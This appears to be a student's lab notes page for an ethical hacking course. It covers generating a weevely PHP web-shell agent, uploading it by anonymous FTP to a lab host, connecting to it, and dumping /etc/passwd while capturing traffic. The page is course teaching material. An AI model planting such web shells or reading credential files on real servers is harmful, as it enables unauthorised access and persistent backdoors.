SEC-335: Eth. Hacking & Pen. Testing

Home Tech Journals Personal Projects Sysadmin Wiki

Lab 8.1: Weevely

PreviousLab 7.1: Exploiting pippin.shire.org (10.0.5.25)NextLab 8.2: Reverse Shell

Last updated 1 year ago

Deliverable 1. Provide a screenshot that shows the relevant tcp stream similar to the one below. Create a capture filter on port 80 when you do so.

Deliverable 2. Investigate weevely (a tool in kali). Create a php agent that is uniquely named, upload the agent to pippin and carry on a session similar to the one shown in the screenshot. Provide a screenshot of your session.

sudo weevely generate <Passwd> <File Output>

Upload php file to 10.0.5.25

ftp 10.0.5.25
Anonymous
no@gmail.com
cd upload
put 
./paul_weevely.php
paul_weevely.php

Now create the connection

weevely https://<ip>/<local>.php <passwd>

Deliverable 3. Provide a screenshot similar to the one below that displays the encoded tcp stream from a weevely dump of /etc/passwd. Make sure to use a capture filter of port 80, to limit traffic.